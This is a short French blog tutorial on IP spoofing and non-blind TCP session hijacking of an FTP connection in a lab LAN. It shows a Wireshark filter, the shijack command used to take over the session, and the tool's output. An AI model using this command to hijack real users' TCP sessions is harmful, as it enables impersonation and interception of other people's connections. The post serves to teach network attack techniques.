mercredi 10 mars 2010

basics 4 - tutoriel IP spoofing - not blind TCP hijacking

L'IP spoofing est l'action de transmettre des paquets IP avec une adresse autre que la nôtre. Cette technique est utilisée dans le cas d'une attaque MAN IN THE MIDDLE ou pour une attaque DDOS. Elle permet de faire croire à une cible qu'elle communique avec une autre machine.
Le TCP hijacking est une technique d'attaque MAN IN THE MIDDLE permettant de s'intercaler dans une session TCP entre deux machines.
Dans cet article, nous mettre en oeuvre l'attaque MORRIS, du nom de son inventeur en 1985 [11] en utilisant le tutoriel [13].

Nous vous renvoyons également à l'excellente présentation suivante: [12].


Le client lance une connexion TCP avec le serveur (par exemple en utilisant Filezilla):

l'intrus sniffe le réseau avec Wireshark:
filtre:
(ip.src == 192.168.0.10 and ip.dst == 192.168.0.2) or (ip.src == 192.168.0.2 and ip.dst == 192.168.0.10)


Tant que l'intrus n'intervient pas, la session FTP (donc la session TCP) reste active entre Filezilla et le serveur.

Puis l'intrus utilise shijack
$ sudo ./shijack-lnx eth1 192.168.0.10 1061 192.168.0.2 21

Waiting for SEQ/ACK to arrive from the srcip to the dstip.
(To speed things up, try making some traffic between the two, /msg person asdf
Got packet! SEQ = 0x7cd72b3d ACK = 0xaaefbd1d
Starting hijack session, Please use ^C to terminate.
Anything you enter from now on is sent to the hijacked TCP connection.
A ce moment, l'intrus se substitue au client dans la session TCP. L'intrus doit également veiller à ce que le client n'envoie pas un RST au serveur.

Le client ne recoit plus de données du serveur et finit par fermer la connexion:

références

11) TCP hikacking - Morris attack - http://www.thetazzone.com/tutorial-a-quick-introduction-to-tcp-session-hijacking/
12) IP spoofing - http://www.commentcamarche.net/contents/attaques/usurpation-ip-spoofing.php3
13) TCP not blind hijacking avec (spwny) shijack http://www.exploit-db.com/papers/11102
14) Michal Zalewski – Strange Attractors and TCP/IP Sequence number analysis – One year later - http://lcamtuf.coredump.cx/newtcp/

Aucun commentaire:

Publier un commentaire